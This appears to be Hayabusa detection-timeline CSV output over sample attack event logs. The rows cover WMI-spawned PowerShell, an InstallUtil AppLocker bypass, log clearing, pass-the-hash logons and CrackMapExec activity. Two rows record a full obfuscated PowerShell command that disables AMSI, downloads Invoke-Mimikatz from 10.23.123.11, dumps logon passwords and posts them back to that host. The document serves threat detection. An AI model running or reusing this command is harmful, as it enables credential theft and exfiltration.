Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x35d1aad | PID: 1860 | PGUID: A57649D1-3BC7-6189-091B-5D0300000000 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx 2021-11-13 23:08:45.929 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: - | Process: | Target Server: cifs/fs03vuln.offsec.lan,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-4648 Lateral movement with net use.evtx 2021-11-13 23:30:53.638 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: hack1 | IP Address: ::1 | Process: C:\Windows\System32\svchost.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx" 2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157add,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 